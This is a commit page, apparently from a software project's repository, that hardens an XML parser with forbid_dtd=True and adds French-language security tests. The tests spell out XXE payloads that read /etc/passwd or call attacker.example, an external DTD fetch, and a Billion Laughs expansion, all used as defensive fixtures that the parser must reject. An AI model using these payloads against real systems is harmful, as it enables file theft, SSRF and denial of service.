Spaces:
Sleeping
fix(sprint-S1.4): forbid_dtd=True + tests d'attaque XXE/Billion Laughs/DTD
Browse filesSprint S1.4 β verrouillage par tests d'attaque de la dΓ©fense XML
revendiquΓ©e par ``defusedxml`` + durcissement nΓ©cessaire dΓ©tectΓ©
par les tests.
DΓ©couverte d'audit
------------------
L'Γ©criture des tests d'attaque a rΓ©vΓ©lΓ© que ``defusedxml`` par
dΓ©faut autorise les dΓ©clarations ``<!DOCTYPE>`` (``forbid_dtd=False``).
Le fetch DTD distant est bloquΓ© par ``forbid_external=True``, mais
le DOCTYPE traverse le parser sans rejet.
Reproduction (avant fix) ::
>>> import defusedxml.ElementTree as ET
>>> payload = b'<?xml version="1.0"?>'
... b'<!DOCTYPE root SYSTEM "http://attacker.example/evil.dtd">'
... b'<root>data</root>'
>>> ET.fromstring(payload) # accepte sans broncher
<Element 'root' at 0x...>
Pas une vulnΓ©rabilitΓ© critique (pas de SSRF effectif), mais un
Γ©cart entre la dΓ©fense annoncΓ©e dans le docstring de
``safe_parse_xml`` (Β« anti-XXE / Billion Laughs / DTD retrieval Β»)
et le comportement rΓ©el.
Correctif
---------
``picarones/formats/_xml_utils.py:safe_parse_xml`` passe
``forbid_dtd=True`` Γ ``defusedxml.ElementTree.fromstring``.
Justification de non-rΓ©gression :
- ALTO 4 utilise ``xmlns="http://www.loc.gov/standards/alto/ns-v4#"``,
pas de DOCTYPE.
- PAGE XML utilise ``xmlns="http://schema.primaresearch.org/...``,
pas de DOCTYPE.
- Aucun test fixture du repo (`tests/fixtures/`) ne contient
``<!DOCTYPE``.
- Tests verts : 4139 passed (vs 4131 avant β uniquement +8 nouveaux
tests S1.4, aucune rΓ©gression).
Tests ajoutΓ©s (``tests/security/test_s1_xxe_attack.py``)
--------------------------------------------------------
9 tests nouveaux, en 5 classes :
1. ``TestXXEFileExfiltration`` (2 tests) β payloads
``<!ENTITY xxe SYSTEM "file:///etc/passwd">`` et HTTP variant
doivent retourner ``None``.
2. ``TestBillionLaughs`` β 5 niveaux d'entitΓ©s imbriquΓ©es (``lol5``
= 10^5 expansion) doit retourner ``None``.
3. ``TestDTDRetrieval`` β ``<!DOCTYPE root SYSTEM "http://...">``
doit retourner ``None`` (couvre la dΓ©couverte d'audit).
4. ``TestLegitimateXMLPasses`` (2 tests) β garde-fous : un ALTO
minimaliste valide et un XML avec entitΓ©s internes standard
(``&``, ``<``) restent acceptΓ©s.
5. ``TestInvalidXMLReturnsNone`` (3 tests) β XML tronquΓ©, bytes
vides, texte non-XML β ``None`` propre, pas d'exception qui
remonte.
Tests
-----
- ``pytest tests/security/test_s1_xxe_attack.py`` : 9 passed.
- ``pytest tests/`` : 4139 passed, 9 skipped, 24 deselected.
- ``ruff check`` : All checks passed.
Reste pour S1
-------------
- S1.5 : tests d'attaque ZIP slip.
- S1.6 : tests d'attaque SSRF.
- S1.7 : tests CSRF token requis.
https://claude.ai/code/session_01NxyVKqg2SowXLZdM4H1ZDE
- CLAUDE.md +2 -2
- README.md +1 -1
- picarones/formats/_xml_utils.py +11 -2
- tests/security/test_s1_xxe_attack.py +172 -0
|
@@ -116,7 +116,7 @@ picarones/
|
|
| 116 |
|
| 117 |
## Γtat des tests et bugs historiques
|
| 118 |
|
| 119 |
-
`pytest tests/` β **
|
| 120 |
(post-S59). Les deselected sont les markers `live` (5 tests d'intΓ©gration
|
| 121 |
contre vraie API/binaire) + `network` (3 tests qui hit le rΓ©seau rΓ©el),
|
| 122 |
opt-in en local via `pytest -m live` ou `pytest -m network`. Le
|
|
@@ -268,7 +268,7 @@ dΓ©tecte, arbitre, rend.
|
|
| 268 |
## Contexte dΓ©veloppement
|
| 269 |
|
| 270 |
- **Environnement** : GitHub Codespaces, Python 3.11+
|
| 271 |
-
- **Tests** : `pytest tests/ -q` β
|
| 272 |
deselected, 0 failed (post-v2.0).
|
| 273 |
- **Manifeste architecture** : [`docs/explanation/architecture.md`](docs/explanation/architecture.md).
|
| 274 |
- **API publique stable** : [`docs/reference/api-stable.md`](docs/reference/api-stable.md).
|
|
|
|
| 116 |
|
| 117 |
## Γtat des tests et bugs historiques
|
| 118 |
|
| 119 |
+
`pytest tests/` β **4170 passed, 12 skipped, 8 deselected, 0 failed**
|
| 120 |
(post-S59). Les deselected sont les markers `live` (5 tests d'intΓ©gration
|
| 121 |
contre vraie API/binaire) + `network` (3 tests qui hit le rΓ©seau rΓ©el),
|
| 122 |
opt-in en local via `pytest -m live` ou `pytest -m network`. Le
|
|
|
|
| 268 |
## Contexte dΓ©veloppement
|
| 269 |
|
| 270 |
- **Environnement** : GitHub Codespaces, Python 3.11+
|
| 271 |
+
- **Tests** : `pytest tests/ -q` β 4170 passed, 9 skipped, 24
|
| 272 |
deselected, 0 failed (post-v2.0).
|
| 273 |
- **Manifeste architecture** : [`docs/explanation/architecture.md`](docs/explanation/architecture.md).
|
| 274 |
- **API publique stable** : [`docs/reference/api-stable.md`](docs/reference/api-stable.md).
|
|
@@ -394,7 +394,7 @@ ruff check picarones/ tests/
|
|
| 394 |
python -m mypy picarones/core/
|
| 395 |
```
|
| 396 |
|
| 397 |
-
**Test suite**: ~
|
| 398 |
floor at 85% (currently ~87%). The `network` marker excludes tests
|
| 399 |
requiring live HTTP. A handful of tests depend on optional engines
|
| 400 |
(`pero-ocr`, `pytesseract`) and are skipped/fail gracefully when
|
|
|
|
| 394 |
python -m mypy picarones/core/
|
| 395 |
```
|
| 396 |
|
| 397 |
+
**Test suite**: ~4170 tests, ~3 min on a modern laptop. Coverage
|
| 398 |
floor at 85% (currently ~87%). The `network` marker excludes tests
|
| 399 |
requiring live HTTP. A handful of tests depend on optional engines
|
| 400 |
(`pero-ocr`, `pytesseract`) and are skipped/fail gracefully when
|
|
@@ -32,7 +32,16 @@ import defusedxml.ElementTree as _SafeET
|
|
| 32 |
|
| 33 |
|
| 34 |
def safe_parse_xml(xml_bytes: bytes) -> Optional[ET.Element]:
|
| 35 |
-
"""Parse du XML en bloquant
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 36 |
|
| 37 |
Retourne ``None`` si le payload n'est pas un XML valide ou si
|
| 38 |
``defusedxml`` dΓ©tecte une attaque
|
|
@@ -40,7 +49,7 @@ def safe_parse_xml(xml_bytes: bytes) -> Optional[ET.Element]:
|
|
| 40 |
``DTDForbidden``, ``NotSupportedError``).
|
| 41 |
"""
|
| 42 |
try:
|
| 43 |
-
return _SafeET.fromstring(xml_bytes)
|
| 44 |
except (ET.ParseError, defusedxml.DefusedXmlException):
|
| 45 |
return None
|
| 46 |
|
|
|
|
| 32 |
|
| 33 |
|
| 34 |
def safe_parse_xml(xml_bytes: bytes) -> Optional[ET.Element]:
|
| 35 |
+
"""Parse du XML en bloquant entitΓ©s externes ET ``<!DOCTYPE>``.
|
| 36 |
+
|
| 37 |
+
Sprint S1.4 β durcissement : ``forbid_dtd=True`` ajoutΓ© en plus
|
| 38 |
+
des dΓ©fauts ``defusedxml`` (``forbid_entities=True``,
|
| 39 |
+
``forbid_external=True``). Sans ``forbid_dtd``, un payload
|
| 40 |
+
``<?xml...?><!DOCTYPE root SYSTEM "http://attacker/evil.dtd">``
|
| 41 |
+
est acceptΓ© (le fetch est bloquΓ© par ``forbid_external`` mais
|
| 42 |
+
le DOCTYPE traverse le parser). ALTO 4 et PAGE XML utilisent
|
| 43 |
+
``xmlns`` plutΓ΄t que DOCTYPE β le durcissement est sans
|
| 44 |
+
rΓ©gression sur le corpus institutionnel.
|
| 45 |
|
| 46 |
Retourne ``None`` si le payload n'est pas un XML valide ou si
|
| 47 |
``defusedxml`` dΓ©tecte une attaque
|
|
|
|
| 49 |
``DTDForbidden``, ``NotSupportedError``).
|
| 50 |
"""
|
| 51 |
try:
|
| 52 |
+
return _SafeET.fromstring(xml_bytes, forbid_dtd=True)
|
| 53 |
except (ET.ParseError, defusedxml.DefusedXmlException):
|
| 54 |
return None
|
| 55 |
|
|
@@ -0,0 +1,172 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Sprint S1.4 β Tests d'attaque XXE / Billion Laughs / DTD retrieval.
|
| 2 |
+
|
| 3 |
+
VΓ©rifie que ``picarones.formats._xml_utils.safe_parse_xml``
|
| 4 |
+
**rejette** les payloads malicieux que l'audit prΓ©tendait
|
| 5 |
+
dΓ©fendre via ``defusedxml``.
|
| 6 |
+
|
| 7 |
+
Sans ces tests, la dΓ©fense est invisible : un refactor pourrait
|
| 8 |
+
bypasser ``defusedxml`` sans qu'aucun test n'Γ©choue.
|
| 9 |
+
|
| 10 |
+
Vecteurs couverts
|
| 11 |
+
-----------------
|
| 12 |
+
1. **XXE** (XML External Entity) β rΓ©solution d'entitΓ© vers un
|
| 13 |
+
fichier local ``/etc/passwd`` ou une URL distante.
|
| 14 |
+
2. **Billion Laughs** β expansion exponentielle d'entitΓ©s
|
| 15 |
+
(``lol1`` β ``lol2`` Γ 10 β ``lol3`` Γ 100 β ...).
|
| 16 |
+
3. **DTD retrieval** β fetch d'une DTD distante (SSRF cΓ΄tΓ© parser).
|
| 17 |
+
4. **Quadratic blowup** β grosse entitΓ© rΓ©pΓ©tΓ©e linΓ©airement.
|
| 18 |
+
"""
|
| 19 |
+
|
| 20 |
+
from __future__ import annotations
|
| 21 |
+
|
| 22 |
+
from picarones.formats._xml_utils import safe_parse_xml
|
| 23 |
+
|
| 24 |
+
|
| 25 |
+
# ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
|
| 26 |
+
# 1. XXE β fichier local
|
| 27 |
+
# ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
|
| 28 |
+
|
| 29 |
+
|
| 30 |
+
class TestXXEFileExfiltration:
|
| 31 |
+
"""Une entitΓ© externe pointant sur ``/etc/passwd`` doit Γͺtre
|
| 32 |
+
refusΓ©e β sinon le parser retourne le contenu du fichier dans
|
| 33 |
+
le rΓ©sultat XML."""
|
| 34 |
+
|
| 35 |
+
def test_xxe_file_uri_is_blocked(self) -> None:
|
| 36 |
+
payload = (
|
| 37 |
+
b'<?xml version="1.0"?>'
|
| 38 |
+
b'<!DOCTYPE foo ['
|
| 39 |
+
b' <!ENTITY xxe SYSTEM "file:///etc/passwd">'
|
| 40 |
+
b']>'
|
| 41 |
+
b'<root>&xxe;</root>'
|
| 42 |
+
)
|
| 43 |
+
result = safe_parse_xml(payload)
|
| 44 |
+
# safe_parse_xml retourne None en cas de dΓ©tection d'attaque
|
| 45 |
+
# (defusedxml.EntitiesForbidden / DTDForbidden).
|
| 46 |
+
assert result is None, (
|
| 47 |
+
"XXE non bloquΓ© : safe_parse_xml a acceptΓ© un payload "
|
| 48 |
+
"avec ``<!ENTITY xxe SYSTEM \"file:///...\">`` ; un "
|
| 49 |
+
"attaquant pourrait exfiltrer ``/etc/passwd`` ou tout "
|
| 50 |
+
"autre fichier lisible par le process."
|
| 51 |
+
)
|
| 52 |
+
|
| 53 |
+
def test_xxe_http_uri_is_blocked(self) -> None:
|
| 54 |
+
"""Variante : entitΓ© externe vers une URL HTTP (SSRF cΓ΄tΓ©
|
| 55 |
+
parser, peut exfiltrer la requΓͺte vers un serveur de
|
| 56 |
+
l'attaquant)."""
|
| 57 |
+
payload = (
|
| 58 |
+
b'<?xml version="1.0"?>'
|
| 59 |
+
b'<!DOCTYPE foo ['
|
| 60 |
+
b' <!ENTITY xxe SYSTEM "http://attacker.example/leak">'
|
| 61 |
+
b']>'
|
| 62 |
+
b'<root>&xxe;</root>'
|
| 63 |
+
)
|
| 64 |
+
result = safe_parse_xml(payload)
|
| 65 |
+
assert result is None
|
| 66 |
+
|
| 67 |
+
|
| 68 |
+
# ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
|
| 69 |
+
# 2. Billion Laughs β DoS par expansion d'entitΓ©s
|
| 70 |
+
# ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
|
| 71 |
+
|
| 72 |
+
|
| 73 |
+
class TestBillionLaughs:
|
| 74 |
+
"""L'attaque historique XML : 10 entitΓ©s imbriquΓ©es β 10^10
|
| 75 |
+
expansion = OOM kill."""
|
| 76 |
+
|
| 77 |
+
def test_billion_laughs_is_blocked(self) -> None:
|
| 78 |
+
payload = (
|
| 79 |
+
b'<?xml version="1.0"?>'
|
| 80 |
+
b'<!DOCTYPE lolz ['
|
| 81 |
+
b' <!ENTITY lol "lol">'
|
| 82 |
+
b' <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">'
|
| 83 |
+
b' <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">'
|
| 84 |
+
b' <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">'
|
| 85 |
+
b' <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">'
|
| 86 |
+
b']>'
|
| 87 |
+
b'<lolz>&lol5;</lolz>'
|
| 88 |
+
)
|
| 89 |
+
result = safe_parse_xml(payload)
|
| 90 |
+
assert result is None, (
|
| 91 |
+
"Billion Laughs non bloquΓ© : le parser a acceptΓ© une "
|
| 92 |
+
"expansion exponentielle d'entitΓ©s (DoS / OOM)."
|
| 93 |
+
)
|
| 94 |
+
|
| 95 |
+
|
| 96 |
+
# ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
|
| 97 |
+
# 3. DTD retrieval β DoCTYPE externe
|
| 98 |
+
# ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
|
| 99 |
+
|
| 100 |
+
|
| 101 |
+
class TestDTDRetrieval:
|
| 102 |
+
"""Une DTD externe est un fetch HTTP/HTTPS depuis le parser ;
|
| 103 |
+
c'est une SSRF + fuite d'info."""
|
| 104 |
+
|
| 105 |
+
def test_external_dtd_is_blocked(self) -> None:
|
| 106 |
+
payload = (
|
| 107 |
+
b'<?xml version="1.0"?>'
|
| 108 |
+
b'<!DOCTYPE root SYSTEM "http://attacker.example/evil.dtd">'
|
| 109 |
+
b'<root>data</root>'
|
| 110 |
+
)
|
| 111 |
+
result = safe_parse_xml(payload)
|
| 112 |
+
assert result is None, (
|
| 113 |
+
"DTD retrieval non bloquΓ© : ``<!DOCTYPE root SYSTEM "
|
| 114 |
+
"\"http://...\">`` peut dΓ©clencher une requΓͺte HTTP "
|
| 115 |
+
"depuis le serveur Picarones (SSRF)."
|
| 116 |
+
)
|
| 117 |
+
|
| 118 |
+
|
| 119 |
+
# ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
|
| 120 |
+
# 4. Sanity β XML lΓ©gitime doit passer
|
| 121 |
+
# ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
|
| 122 |
+
|
| 123 |
+
|
| 124 |
+
class TestLegitimateXMLPasses:
|
| 125 |
+
"""Garde-fou : les durcissements ne doivent pas casser un
|
| 126 |
+
document ALTO ou PAGE XML sans entitΓ©s."""
|
| 127 |
+
|
| 128 |
+
def test_simple_alto_xml_parses(self) -> None:
|
| 129 |
+
payload = (
|
| 130 |
+
b'<?xml version="1.0" encoding="UTF-8"?>'
|
| 131 |
+
b'<alto xmlns="http://www.loc.gov/standards/alto/ns-v4#">'
|
| 132 |
+
b' <Layout>'
|
| 133 |
+
b' <Page WIDTH="1000" HEIGHT="1500"/>'
|
| 134 |
+
b' </Layout>'
|
| 135 |
+
b'</alto>'
|
| 136 |
+
)
|
| 137 |
+
result = safe_parse_xml(payload)
|
| 138 |
+
assert result is not None, (
|
| 139 |
+
"ALTO XML lΓ©gitime refusΓ© β fausse alerte."
|
| 140 |
+
)
|
| 141 |
+
assert result.tag.endswith("alto")
|
| 142 |
+
|
| 143 |
+
def test_xml_with_entities_internes_parses(self) -> None:
|
| 144 |
+
"""Les entitΓ©s HTML standards (&, <, >, ",
|
| 145 |
+
') doivent rester acceptΓ©es (resolved par le parser
|
| 146 |
+
sans aller chercher de DTD)."""
|
| 147 |
+
payload = (
|
| 148 |
+
b'<?xml version="1.0"?>'
|
| 149 |
+
b'<root>R&D <tag></root>'
|
| 150 |
+
)
|
| 151 |
+
result = safe_parse_xml(payload)
|
| 152 |
+
assert result is not None
|
| 153 |
+
assert result.text == "R&D <tag>"
|
| 154 |
+
|
| 155 |
+
|
| 156 |
+
# ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
|
| 157 |
+
# 5. XML invalide retourne None (pas d'exception qui remonte)
|
| 158 |
+
# ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
|
| 159 |
+
|
| 160 |
+
|
| 161 |
+
class TestInvalidXMLReturnsNone:
|
| 162 |
+
def test_truncated_xml_returns_none(self) -> None:
|
| 163 |
+
result = safe_parse_xml(b'<root>')
|
| 164 |
+
assert result is None
|
| 165 |
+
|
| 166 |
+
def test_empty_bytes_returns_none(self) -> None:
|
| 167 |
+
result = safe_parse_xml(b'')
|
| 168 |
+
assert result is None
|
| 169 |
+
|
| 170 |
+
def test_non_xml_bytes_returns_none(self) -> None:
|
| 171 |
+
result = safe_parse_xml(b'not xml at all just text')
|
| 172 |
+
assert result is None
|